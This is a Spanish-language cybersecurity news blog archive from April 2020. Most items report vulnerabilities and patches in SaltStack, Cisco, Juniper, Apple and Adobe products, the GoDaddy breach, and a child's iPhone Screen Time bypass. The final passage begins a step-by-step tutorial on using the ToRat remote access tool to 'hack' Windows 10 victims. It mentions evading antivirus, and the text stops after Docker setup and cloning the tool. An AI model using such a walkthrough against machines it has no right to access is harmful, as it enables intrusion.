RaFa Núñez Aponte: abril 2020

jueves, 30 de abril de 2020

¿Google Meet es lo suficientemente seguro para empresas o universidades?

Debido al distanciamiento social como medida para frenar los contagios de coronavirus, el uso de herramientas de comunicación remota, principalmente plataformas de videoconferencia, ha incrementado de forma inusitada, aseguran expertos en seguridad de la información. Una de las compañías más beneficiadas es Zoom, que ha ganado cientos de miles de usuarios en las más recientes semanas.

Si bien estas herramientas han ayudado a mantener millones de empleos, no todo son buenas noticias, pues a medida que incrementa su uso, también se revelan más y más fallas de seguridad y prácticas cuestionables que ponen en riesgo la seguridad de la información de los usuarios. Es por ello que, además de ofrecer un servicio de calidad, las compañías tecnológicas han comenzado a implementar cada vez más controles y así poder anunciarse como opciones de videoconferencia más seguras.

Una de estas compañías es Google, que acaba de anunciar el lanzamiento de Google Meet, una plataforma de videoconferencia gratuita que estará disponible en menos de una semana. Acorde a los expertos en seguridad de la información, Google ha invertido años de investigación y desarrollo para hacer de Meet una plataforma funcional, segura y confiable que pueda ser utilizada por organizaciones públicas, empresas privadas, escuelas y usuarios individuales de todo el mundo.

Desde los primeros días de mayo, cualquier usuario con cuenta de Gmail podrá registrarse en Meet y probar sus múltiples características, que incluyen una interfaz muy fácil de utilizar, uso compartido de pantalla, subtítulos en tiempo real y personalización.

Entre las principales características de Google Meet, destacan:

Un conjunto sólido de controles para el host, incluyendo la capacidad de admitir o denegar la entrada a una sesión, y silenciar o eliminar a un participante
La decisión de no permitir a usuarios anónimos, limitando algunos ataques
Los códigos para ingresar a una sesión de Meet son complejos por defecto, previniendo los ataques de fuerza bruta
Las sesiones de Meet están cifradas en tránsito, y todas las grabaciones almacenadas en Google Drive también contarán con cifrado
Meet estará completamente basado en Chrome, por lo que no se requerirá de la instalación de algún plugin o herramienta adicional, lo que vuelve a los usuarios menos susceptibles a algunos ataques

Además, los expertos en seguridad de la información aseguran que Google Meet operará en una red privada altamente segura y resistente, lo que muestra el fuerte enfoque en la seguridad de la información de los usuarios.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que las plataformas oficiales de las compañías tecnológicas.

El cargo ¿Google Meet es lo suficientemente seguro para empresas o universidades? apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Pasar el control total de su centro de datos a los hackers a través de CVE-2020-11651 y CVE-2020-11652

Olle Segerdahl, especialista en seguridad en base de datos de F-Secure, ha revelado dos vulnerabilidades en Salt, un software de código abierto que algunas organizaciones emplean para mantener centros de datos y entornos en la nube.

El experto y su equipo descubrieron estas fallas de seguridad durante un análisis rutinario a finales de marzo. Las vulnerabilidades, identificadas como CVE-2020-11651 y CVE-2020-11652, pueden ser explotadas por actores de amenazas para esquivar los controles de autenticación empleados por Salt (que consisten en un “servidor maestro” y un “servidor minion”). Explotando estas fallas, los hackers maliciosos pueden ejecutar código remoto con privilegios de root en el servidor maestro, por ende comprometiendo los servidores minions activos.

En un escenario de ataque potencial, un hacker podría usar el servidor maestro para obtener una gran capacidad de procesamiento y llevar a cabo una campaña de minado de criptomoneda, aunque esta es sólo una de muchas posibilidades. Acorde a los expertos en seguridad en base de datos, los hackers también podrían instalar backdoors para acceder a la red comprometida y robar datos confidenciales, así como desplegar ransomware o incluso amenazar a la víctima con revelar información confidencial.

Las vulnerabilidades recibieron un puntaje de 10/10 en la escala del Common Vulnerability Scoring System (CVSS), por lo que se les considera errores críticos. Cabe recordar que el puntaje de 10 en esta escala sólo es otorgado a errores prioritarios según la Base de Datos Nacional de Vulnerabilidades (NVD).

Un incidente relevante relacionado con estas fallas es el hallazgo de 6000 servidores maestros de Salt descubiertos recientemente en Internet. “Esperaba que esta cifra fuese mucho más baja; cuando estas fallas son reveladas al público, los hackers comienzan a explotar los host expuestos, pues son más vulnerables”, asegura el experto en seguridad en base de datos.

Las vulnerabilidades afectan a la versión 3000.1 y anteriores de Salt, es decir, prácticamente todas las versiones en uso de este software antes de la actualización de SaltStack. A pesar de que los hackers tendrían, en teoría, mayores dificultades para llegar a hosts ocultos en Internet, éstos aún podrían ser explotados si los atacantes acceden por otra forma a las redes corporativas.

Como medida de seguridad, Segerdahl recomienda que los administradores habiliten la actualización automática de SaltStack, lo que implementará los próximos parches de seguridad de forma inmediata. El Instituto Internacional de Seguridad Cibernética (IICS) también recomienda restringir el acceso a los puertos maestros de Salt o, por lo menos, bloquear los host de Internet abierto.

El cargo Pasar el control total de su centro de datos a los hackers a través de CVE-2020-11651 y CVE-2020-11652 apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Nuevas vulnerabilidades de enrutadores Cisco SD-WAN son un tesoro para los hackers

Como cada semana, los expertos en seguridad de aplicaciones de Cisco anunciaron actualizaciones para productos afectados por vulnerabilidades de seguridad. En esta ocasión, se corrigió una vulnerabilidad severa en el software de su enrutador que podría ser explotada por un actor de amenazas local y autenticado para ejecutar comandos arbitrarios con privilegios de root.

La falla existe en Cisco IOS XE. Esta versión de sistema operativo basada en Linux se utiliza en enrutadores de red de área amplia (SD-WAN) definidos por software de Cisco. Los enrutadores afectados incluyen los modelos de enrutadores de servicios de agregación (ASR) 1000, los enrutadores de servicios integrados (ISR) 1000, los modelos ISR 4000 y los modelos de enrutador de servicios en la nube 1000V.

Esta falla existe en la utilidad de interfaz de línea de comando (CLI) de Cisco IOX XE, empleada para la configuración de red de los enrutadores. Esta CLI no valida de forma adecuada los comandos de entrada, por lo que un actor de amenazas podría aprovechar esta condición para autenticarse en el dispositivo y enviar una entrada especialmente diseñada al CLI. Acorde a los expertos en seguridad de aplicaciones, no se tienen reportes de algún intento de explotación de esta vulnerabilidad en escenarios reales.

Cabe mencionar que el atacante debe contar con autenticación en el sistema para acceder a la utilidad CLI; la explotación de esta falla podría permitir al hacker malicioso ejecutar comandos con privilegios de root. La vulnerabilidad fue identificada como CVE-2019-1600 y cuenta con un puntaje de 7.8/10 en la escala del Common Vulnerability Scoring System (CVSS), por lo que se le considera un inconveniente severo.

El software IOS XE de Cisco ha presentado múltiples problemas de seguridad recientemente. A inicios de marzo, Cisco lanzó 24 parches relacionados con diversas vulnerabilidades en el sistema operativo IOS XE. A inicios de 2020, la compañía también lanzó algunas correcciones para otro problema técnico considerado severo en la interfaz de usuario web de Cisco IOS y Cisco IOS XE Software.

Acorde a los expertos en seguridad de aplicaciones, Cisco también corrigió una vulnerabilidad de alta gravedad en IOS XE, que podría permitir a un atacante remoto reconfigurar o ejecutar comandos en los dispositivos afectados. Y en agosto, se encontró una vulnerabilidad crítica de omisión de autenticación remota, con el nivel de gravedad más alto posible de 10 de 10 en la escala CvSS, en el contenedor de servicios virtuales API REST de Cisco para el software Cisco IOS XE.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Nuevas vulnerabilidades de enrutadores Cisco SD-WAN son un tesoro para los hackers apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

miércoles, 29 de abril de 2020

Múltiples vulnerabilidades cero clics encontradas en Apple iPhone, iPad, Mac por Google

Hace apenas unos meses, los expertos en seguridad web de Project Zero, de Google, revelaron algunas vulnerabilidades de seguridad en el sistema operativo iOS, de Apple, que podrían ser explotadas para comprometer completamente un dispositivo. Esta revelación generó severas críticas para Google, pues posteriormente se supo que estas fallas no estaban presentes sólo en el sistema operativo de Apple.

A pesar de las críticas, los miembros de Project Zero han revelado un nuevo informe sobre algunas vulnerabilidades presentes en los sistemas operativos de Apple, que podrían ser explotadas por actores de amenazas para obtener un punto de acceso a un dispositivo comprometido.

Acorde a los investigadores en seguridad web de Project Zero, las vulnerabilidades reportadas son un antiguo problema relacionado con los archivos multimedia enviados vía plataformas de mensajería instantánea en el marco de ImageIO. Las fallas fueron reportadas a Apple, que se apresuró a lanzar las correcciones correspondientes.

En su reporte, el equipo de Google advierte que a pesar de que las vulnerabilidades reveladas no permiten tomar control de un dispositivo o la exposición de datos confidenciales, algunas de estas fallas pueden ser explotadas para la ejecución de código remoto sin interacción del usuario afectado.

Expertos en seguridad web aseguran que la explotación de vulnerabilidades usando imágenes no es un fenómeno poco común. Recientemente se han revelado múltiples informes sobre algunas fallas en las plataformas de mensajería y otros servicios de comunicación remota; en la mayoría de los casos, el ataque se desencadena cuando se recibe una imagen y el dispositivo requiere analizar los datos para saber cómo administrar y mostrar el archivo. La mayoría están en formatos como JPEG, GIF o PNG, aunque existen otros tipos de archivo menos comunes.

Project Zero demostró la existencia de estas vulnerabilidades empleando un método conocido como aleatorización de datos, por lo que el dispositivo se volvía incapaz de manejar adecuadamente una imagen. Esto abre la puerta a los actores de amenazas para desplegar ataques posteriores.

Como medida de seguridad, Google sugirió a los fabricantes adoptar este modelo de pruebas; implementar soporte sólo para los formatos de imagen más comunes también puede ser una buena medida para mitigar el riesgo de explotación de estas fallas.

Al parecer, estas fallas están presentes en todos los sistemas operativos de Apple, incluso en los que han sido recientemente actualizados. Cabe mencionar que este es un vector de ataque muy sofisticado, por lo que una campaña de explotación masiva de estas fallas es muy poco probable.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Múltiples vulnerabilidades cero clics encontradas en Apple iPhone, iPad, Mac por Google apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Enrutadores, switches y firewalls de Juniper afectados por vulnerabilidad día cero de ejecución remota de código

Especialistas en seguridad de aplicaciones han revelado la existencia de una vulnerabilidad en el sistema operativo Juniper Junos que podría ser explotada por actores de amenazas para desencadenar la ejecución remota de código, esquivar las restricciones de seguridad y para exponer información confidencial del sistema objetivo.

La vulnerabilidad está presente en las siguientes versiones de Junos OS: 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4 y 20.1

Explotando esta vulnerabilidad, un hacker malicioso podría inyectar comandos en httpd.log, leer archivos con permiso de archivo legible ‘world’ e incluso obtener tokens de sesión J-Web.

En el caso de la inyección de comandos, debido a que el servicio HTTP se ejecuta como usuario ‘nobody’, el impacto de esta inyección de comandos es limitado, mencionan los especialistas en seguridad de aplicaciones. En el reporte se señala que la vulnerabilidad recibió un puntaje de 5.3/10 en la escala del Common Vulnerability Scoring System (CVSS).

Respecto a la lectura de archivos con permiso de lectura ‘world’, en Junos OS 19.3R1 y versiones posteriores, los actores de amenazas no autenticados podrían acceder al archivo de configuración explotando la vulnerabilidad. Esta falla de seguridad recibió un puntaje de 5.9/10 en la escala del CVSS.

Además, si J-Web está habilitado, el atacante podría obtener el mismo nivel de acceso de cualquiera que haya iniciado sesión de forma activa. Si un administrador objetivo inicia sesión, el actor de amenazas podría obtener acceso de administrador a J-Web. Esta falla recibió un puntaje de 8.8/10 en la escala del CVSS, por lo que se le considera un error serio. Cabe mencionar que este problema solo afecta a los dispositivos Junos OS con servicios HTTP/HTTPS habilitados.

En resumen, los expertos en seguridad de aplicaciones mencionan:

Si los servicios HTTP/HTTPS están deshabilitados, el impacto de esta falla es mínimo
Si los servicios HTTP/HTTPS están habilitados y J-Web no está en uso, esta vulnerabilidad tiene una puntuación CVSS de 5.9
Si J-Web está habilitado, esta vulnerabilidad tiene una puntuación CVSS de 8.8

Hasta el momento sólo se conoce de un caso de explotación en entornos reales de esta vulnerabilidad. Por precaución, Juniper notificará a los clientes para que puedan tomar las medidas adecuadas. El Equipo de Respuesta a Incidentes de Seguridad de Juniper (SIRT) reconoció las vulnerabilidades poco después de recibir el reporte y comenzó a trabajar de inmediato en su corrección.

Por el momento no existen soluciones alternativas para mitigar el riesgo de explotación, por lo que se recomienda a los administradores de implementaciones expuestas actualizar a las más recientes versiones cuanto antes.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Enrutadores, switches y firewalls de Juniper afectados por vulnerabilidad día cero de ejecución remota de código apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Esta niña de 8 años encontró un método para esquivar los controles parentales en su iPhone. ¿Apple le pagará una recompensa?

A pesar de la vigilancia parental, los niños están cada vez más familiarizados con la tecnología, afirman expertos en seguridad de la información. Aplicaciones como Facebook, YouTube y los buscadores de Internet son herramientas muy sencillas de utilizar para cualquier niño, aunque algunos llevan ventaja.

Existen algunas funciones que limitan el tiempo de uso de un dispositivo o aplicación después de un periodo de tiempo determinado. No obstante, algunos niños se las han arreglado para esquivar estas limitantes impuestas por sus padres. Este es el caso de una niña de ocho años, que logró eliminar estas restricciones en un iPhone.

La historia fue publicada en Reddit, mencionan los expertos en seguridad de la información. Un usuario de la plataforma narró cómo su hermana menor, empleando un iPhone 6 con iOS v12.4.6, logró evadir la función “Screen Time”, habilitada por sus padres para que YouTube dejara de estar disponible por tiempo determinado.

Sin embargo, la niña logró encontrar una solución simple, empleando la aplicación de Apple iMessage. Todo lo que la niña tuvo que hacer fue ingresar a la tienda de aplicaciones vía iMessage y buscar la app de YouTube. Desde AppStore, la niña simplemente seleccionó la opción “Abrir”, con lo que la función Screen Time quedó rebasada.

El usuario describió la situación como algo desconcertante y asombroso, pues nunca pensó que su pequeña hermana pudiese idear una forma de eludir los mecanismos de seguridad para el uso de su smartphone. Además, el usuario probó esta solución alternativa en su propio iPhone X, con iOSv13.4.1 (que es una versión posterior del sistema operativo), descubriendo que también era posible realizar el truco en dicho sistema.

Esta no es la primera ocasión que se revela un caso similar; hace algunos meses, expertos en seguridad de la información dieron a conocer las historias de múltiples infantes que lograban eliminar esta clase de restricciones y usar sus dispositivos con total libertad.

Esta es una muestra de la capacidad de análisis de los niños y su aplicación en el campo de la tecnología, aunque también es una muestra del poco compromiso que las compañías tecnológicas tienen con la protección infantil, menciona un representante de la organización sin fines de lucro Protect Young Eyes, quien invita a los fabricantes a idear mejores medidas de protección y seguridad infantil.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Esta niña de 8 años encontró un método para esquivar los controles parentales en su iPhone. ¿Apple le pagará una recompensa? apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Godaddy hackeado, los clientes deben restablecer las contraseñas con urgencia

Godaddy mencionó que ha restablecido las contraseñas de los usuarios y las cuentas SSH como una “medida de precaución” después de detectar el acceso no autorizado a una base de datos que contiene información sobre millones de sus clientes.

La compañía dijo que recibió una alerta de que uno de sus servidores fue accedido incorrectamente. La compañía recomienda al usuario que realice una auditoría de la cuenta de hosting.

La compañía dijo: “En nombre de todo el equipo de GoDaddy, queremos decir cuánto apreciamos su negocio y que lamentamos sinceramente que haya ocurrido este incidente.

Le brindamos un año de seguridad de sitio web Deluxe y eliminación garantizada de malware sin costo. Estos servicios ejecutan análisis en su sitio web para identificarlo y alertarlo sobre posibles vulnerabilidades de seguridad.

Con este servicio, si surge un problema, hay una forma especial de contactar a nuestro equipo de seguridad y ellos estarán allí para ayudar ”

El cargo Godaddy hackeado, los clientes deben restablecer las contraseñas con urgencia apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Las vulnerabilidades críticas en Adobe Bridge, Magento e Illustrator permiten que los hackers remotos lo espíen

Los expertos en pruebas de seguridad informática de Adobe han lanzado múltiples actualizaciones de seguridad para los productos Adobe Illustrator, Bridge y Magento, con lo que será, corregidas múltiples vulnerabilidades, incluyendo algunas que permitirían a los actores de amenazas la ejecución de código remoto.

Las vulnerabilidades de ejecución remota de código se consideran críticas, ya que podrían permitir a un atacante remoto explotar errores en software público para ejecutar comandos en el contexto de seguridad del proceso explotado. Las actualizaciones corrigen un total de diecisiete vulnerabilidades en Adobe Bridge que permiten la divulgación de información y la ejecución de código arbitrario.

De las diecisiete vulnerabilidades corregidas en esta actualización, tres se clasifican como ‘Importantes’ y el resto son consideradas ‘Críticas’, mencionan los especialistas en pruebas de seguridad informática. A continuación se presenta una lista de las vulnerabilidades encontradas y corregidas.

Adobe Bridge

CVE-2020-9555: Vulnerabilidad crítica de ejecución de código arbitrario de desbordamiento de búfer basado en pila
CVE-2020-9562: Vulnerabilidad crítica de ejecución de código arbitrario
CVE-2020-9568: Vulnerabilidad crítica de corrupción de la memoria que permite la ejecución de código arbitrario
CVE-2020-9553: Vulnerabilidad importante de divulgación de información
CVE-2020-9554: Vulnerabilidad crítica de escritura fuera de los límites que permite la ejecución arbitraria de código
CVE-2020-9566: Vulnerabilidad use-after-free crítica que permite la ejecución de código arbitrario

Para corregir estas fallas, los usuarios deben instalar Adobe Bridge v10.0.4.

Adobe Illustrator

Estas actualizaciones corrigen vulnerabilidades que permiten la divulgación de información y la ejecución de código arbitrario.

CVE-2020-9570: Vulnerabilidad crítica de corrupción de la memoria que permite la ejecución de código arbitrario
CVE-2020-9571: Vulnerabilidad crítica de corrupción de la memoria que permite la ejecución de código arbitrario
CVE-2020-9572: Vulnerabilidad crítica de corrupción de la memoria que permite la ejecución de código arbitrario

Acorde a los expertos en pruebas de seguridad informática, los usuarios deben instalar Adobe Illustrator 2020 v24.1.2 para corregir estas fallas.

Adobe Magento

La actualización corrige trece vulnerabilidades en Magento que podrían conducir a la ejecución de código, divulgación de información, entre otras fallas críticas. Algunas de las fallas corregidas en esta actualización son:

CVE-2020-9576: Esta es una falla de inyección de comandos que permite la ejecución de código arbitrario
CVE-2020-9577: Scripting almacenado entre sitios que expone información confidencial
CVE-2020-9578: Vulnerabilidad crítica de inyección de comandos que permite la ejecución de código arbitrario
CVE-2020-9579: Vulnerabilidad crítica de omisión de mitigaciones de seguridad que permite la ejecución de código arbitrario
CVE-2020-9582: Vulnerabilidad crítica de inyección de comandos que permite la ejecución de código arbitrario
CVE-2020-9585: Vulnerabilidad importante de mitigación de seguridad in-depht que permite la ejecución de código arbitrario

Los usuarios deben instalar la más reciente versión de Magento para corregir estas vulnerabilidades.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Las vulnerabilidades críticas en Adobe Bridge, Magento e Illustrator permiten que los hackers remotos lo espíen apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

HACKEAR WINDOWS 10 UTILIZANDO TORAT (HERRAMIENTA DE ADMINISTRADOR REMOTO) – PASO A PASO

INTRODUCCIÓN

ToRat es la herramienta de administrador remoto. Con esta herramienta, podemos hackear la máquina de la víctima si la víctima no tiene ningún tipo de protección antivirus en su máquina. Esta herramienta ToRat está completamente construida en el lenguaje Go mediante el uso de la máquina de transporte TOR. Según el investigador de hacking ético con algunos ajustes, puede evitar la protección AV. Podemos ejecutar esta herramienta en Windows, sistemas operativos de clientes Linux. Podemos usar esta herramienta con fines educativos.

ENTORNO:

SO: ubuntu 18.04.4 64 bit

Versión de Kernel: 5.3.0

PASOS DE INSTALACIÓN:

Antes de instalar la herramienta, tenemos que instalar Docker – engine

INSTALACIÓN DE DOCKER

Aquí, mostraremos cómo instalar docker-engine en nuestro sistema operativo
Ahora, use este comando para actualizar los paquetes
- sudo apt-get update

root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo apt-get update
Hit:1 http://in.archive.ubuntu.com/ubuntu bionic InRelease
Get:2 http://in.archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB]
Get:3 http://in.archive.ubuntu.com/ubuntu bionic-backports InRelease [74.6 kB]
Get:4 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease [3,956 B]
Get:5 http://in.archive.ubuntu.com/ubuntu bionic-updates/main i386 Packages [661 kB]
Hit:7 https://deb.nodesource.com/node_10.x bionic InRelease
Get:8 http://in.archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [897 kB]
Get:9 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB]
Get:10 https://packages.microsoft.com/ubuntu/18.04/prod bionic InRelease [4,002 B]
Get:6 http://ftp.harukasan.org/kali kali-rolling InRelease [30.5 kB]
================================================================================================SNIP===============================================================================================
Get:46 http://in.archive.ubuntu.com/ubuntu bionic-backports/universe amd64 Packages [4,020 B]
Get:47 http://in.archive.ubuntu.com/ubuntu bionic-backports/universe amd64 DEP-11 Metadata [7,980 B]
Get:48 http://ftp.harukasan.org/kali kali-rolling/main i386 Packages [16.2 MB]
Get:49 http://ftp.harukasan.org/kali kali-rolling/contrib amd64 Packages [99.2 kB]
Get:50 http://ftp.harukasan.org/kali kali-rolling/contrib i386 Packages [93.3 kB]
Get:51 http://ftp.harukasan.org/kali kali-rolling/non-free i386 Packages [166 kB]
Get:52 http://ftp.harukasan.org/kali kali-rolling/non-free amd64 Packages [193 kB]
Fetched 42.4 MB in 3min 29s (203 kB/s)
Reading package lists... Done

Luego, use este comando para instalar los paquetes

sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    gnupg-agent \
    software-properties-common
root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo apt-get install \
>     apt-transport-https \
>     ca-certificates \
>     curl \
>     gnupg-agent \
>     software-properties-common
Reading package lists... Done
Building dependency tree
Reading state information... Done
software-properties-common is already the newest version (0.96.24.32.12).
software-properties-common set to manually installed.
curl is already the newest version (7.68.0-1).
=============================================================================================SNIP==================================================================================================
Setting up ca-certificates (20190110) ...
Updating certificates in /etc/ssl/certs...
2 added, 7 removed; done.
Setting up dirmngr (2.2.20-1) ...
Created symlink /etc/systemd/user/sockets.target.wants/dirmngr.socket → /usr/lib/systemd/user/dirmngr.socket.
Setting up gpg (2.2.20-1) ...
Setting up gpg-wks-server (2.2.20-1) ...
Setting up gpg-wks-client (2.2.20-1) ...
Setting up gnupg (2.2.20-1) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
Processing triggers for install-info (6.5.0.dfsg.1-2) ...
Processing triggers for libc-bin (2.29-10) ...
Processing triggers for ca-certificates (20190110) ...
Updating certificates in /etc/ssl/certs...
0 added, 0 removed; done.
Running hooks in /etc/ca-certificates/update.d...
done.

Ahora, use este comando para agregar la clave GPG oficial de Docker
- curl -fsSL https://ift.tt/2mSP8Vu | sudo apt-key add –

root@ubuntu1-VirtualBox:/home/iicybersecurity# curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
OK

Ahora, tenemos que verificar la clave con la huella digital que tenemos 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88 buscando con los últimos 8 caracteres de la huella digital
- sudo apt-key fingerprint 0EBFCD88

root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo apt-key fingerprint 0EBFCD88
pub   rsa4096 2017-02-22 [SCEA]
      9DC8 5822 9FC7 DD38 854A  E2D8 8D81 803C 0EBF CD88
uid           [ unknown] Docker Release (CE deb) <docker@docker.com>
sub   rsa4096 2017-02-22 [S]

A continuación, use este comando para configurar el repositorio Stable

sudo add-apt-repository \
   "deb [arch=amd64] https://download.docker.com/linux/ubuntu 
   (lsb_release -cs) \
   stable"
root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo add-apt-repository \
>    "deb [arch=amd64] https://download.docker.com/linux/ubuntu \
>  (lsb_release -cs) \
>    stable"
Hit:1 https://deb.nodesource.com/node_10.x bionic InRelease
Get:2 https://download.docker.com/linux/ubuntu bionic InRelease [64.4 kB]
Hit:3 http://in.archive.ubuntu.com/ubuntu bionic InRelease
Hit:4 http://in.archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:5 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease
Hit:6 http://in.archive.ubuntu.com/ubuntu bionic-backports InRelease
Get:7 https://download.docker.com/linux/ubuntu bionic/stable amd64 Packages [11.0 kB]
Hit:8 https://packages.microsoft.com/ubuntu/18.04/prod bionic InRelease
Hit:10 http://security.ubuntu.com/ubuntu bionic-security InRelease
Hit:9 http://ftp.harukasan.org/kali kali-rolling InRelease
Fetched 75.5 kB in 2s (43.4 kB/s)
Reading package lists... Done
Install Docker Engine – Community
Use this command to update the packages sudo apt-get update
root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo apt-get update
Hit:1 http://in.archive.ubuntu.com/ubuntu bionic InRelease
Hit:2 https://download.docker.com/linux/ubuntu bionic InRelease
Hit:3 http://in.archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:4 https://deb.nodesource.com/node_10.x bionic InRelease
Hit:5 http://in.archive.ubuntu.com/ubuntu bionic-backports InRelease
Hit:6 http://security.ubuntu.com/ubuntu bionic-security InRelease
Hit:7 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease
Hit:8 https://packages.microsoft.com/ubuntu/18.04/prod bionic InRelease
Hit:9 http://ftp.harukasan.org/kali kali-rolling InRelease
Reading package lists... Done

Ahora, use este comando para instalar la última versión de docker-engine
- sudo apt-get install docker-ce docker-ce-cli containerd.io

root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo apt-get install docker-ce docker-ce-cli containerd.io
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  bundler fonts-lato g++-7 gyp javascript-common john john-data libblas3 libc-ares2 libhttp-parser2.7.1 libjs-async libjs-inherits libjs-jquery libjs-node-uuid libjs-underscore liblinear4
  libruby2.5 libstdc++-7-dev libuv1 libuv1-dev linux-headers-5.3.0-28 linux-headers-5.3.0-28-generic linux-image-5.3.0-28-generic linux-modules-5.3.0-28-generic
  linux-modules-extra-5.3.0-28-generic lua-lpeg nasm nmap nmap-common node-abbrev node-ansi node-ansi-color-table node-archy node-async node-balanced-match node-block-stream
  node-brace-expansion node-builtin-modules node-combined-stream node-concat-map node-cookie-jar node-delayed-stream node-forever-agent node-form-data node-fs.realpath node-fstream
  node-fstream-ignore node-github-url-from-git node-glob node-graceful-fs node-gyp node-hosted-git-info node-inflight node-inherits node-ini node-is-builtin-module node-isexe
  node-json-stringify-safe node-lockfile node-lru-cache node-mime node-minimatch node-mkdirp node-mute-stream node-node-uuid node-nopt node-normalize-package-data node-npmlog node-once
  node-osenv node-path-is-absolute node-pseudomap node-qs node-read node-read-package-json node-request node-retry node-rimraf node-semver node-sha node-slide node-spdx-correct
  node-spdx-expression-parse node-spdx-license-ids node-tar node-tunnel-agent node-underscore node-validate-npm-package-license node-which node-wrappy node-yallist nodejs-doc rake ruby
  ruby-bundler ruby-dev ruby-did-you-mean ruby-json ruby-minitest ruby-molinillo ruby-net-http-persistent ruby-net-telnet ruby-power-assert ruby-test-unit ruby-thor ruby-xmlrpc ruby2.5
  ruby2.5-dev ruby2.5-doc rubygems-integration
===============================================================================================SNIP================================================================================================
Selecting previously unselected package docker-ce-cli.
Preparing to unpack .../4-docker-ce-cli_5%3a19.03.8~3-0~ubuntu-bionic_amd64.deb ...
Unpacking docker-ce-cli (5:19.03.8~3-0~ubuntu-bionic) ...
Selecting previously unselected package docker-ce.
Preparing to unpack .../5-docker-ce_5%3a19.03.8~3-0~ubuntu-bionic_amd64.deb ...
Unpacking docker-ce (5:19.03.8~3-0~ubuntu-bionic) ...
Setting up aufs-tools (1:4.14+20190211-1) ...
Setting up containerd.io (1.2.13-1) ...
Created symlink /etc/systemd/system/multi-user.target.wants/containerd.service → /lib/systemd/system/containerd.service.
Setting up cgroupfs-mount (1.4) ...
update-rc.d: We have no instructions for the cgroupfs-mount init script.
update-rc.d: It looks like a non-network service, we enable it.
Setting up docker-ce-cli (5:19.03.8~3-0~ubuntu-bionic) ...
Setting up pigz (2.4-1+b1) ...
Setting up docker-ce (5:19.03.8~3-0~ubuntu-bionic) ...
Created symlink /etc/systemd/system/multi-user.target.wants/docker.service → /lib/systemd/system/docker.service.
Created symlink /etc/systemd/system/sockets.target.wants/docker.socket → /lib/systemd/system/docker.socket.
update-rc.d: We have no instructions for the docker init script.
update-rc.d: It looks like a non-network service, we enable it.
Processing triggers for libc-bin (2.29-10) ...
Processing triggers for systemd (237-3ubuntu10.38) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
/usr/bin/mandb: can't write to /var/cache/man/12386: No space left on device
/usr/bin/mandb: can't create index cache /var/cache/man/12386: No space left on device
Processing triggers for ureadahead (0.100.0-21) ...

Ahora, verifique la comunidad del motor de docker sudo docker run hello-world

root@ubuntu1-VirtualBox:/home/iicybersecurity# sudo docker run hello-world
Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
1b930d010525: Pull complete
Digest: sha256:f9dfddf63636d84ef479d645ab5885156ae030f611a56f3a7ac7f2fdd86d7e4e
Status: Downloaded newer image for hello-world:latest
 
Hello from Docker!
This message shows that your installation appears to be working correctly.

INSTALACIÓN DE TORAT

Use el comando para clonar el archivo
- git clone https://ift.tt/2Yc82f0

root@ubuntu1-VirtualBox:/home/iicybersecurity# git clone https://github.com/lu4p/ToRat.git
Cloning into 'ToRat'...
remote: Enumerating objects: 21, done.
remote: Counting objects: 100% (21/21), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 419 (delta 5), reused 10 (delta 3), pack-reused 398
Receiving objects: 100% (419/419), 125.46 KiB | 354.00 KiB/s, done.
Resolving deltas: 100% (185/185), done.

Use el comando cd para ingresar al directorio.
cd ToRat/

root@ubuntu1-VirtualBox:/home/iicybersecurity# cd ToRat/
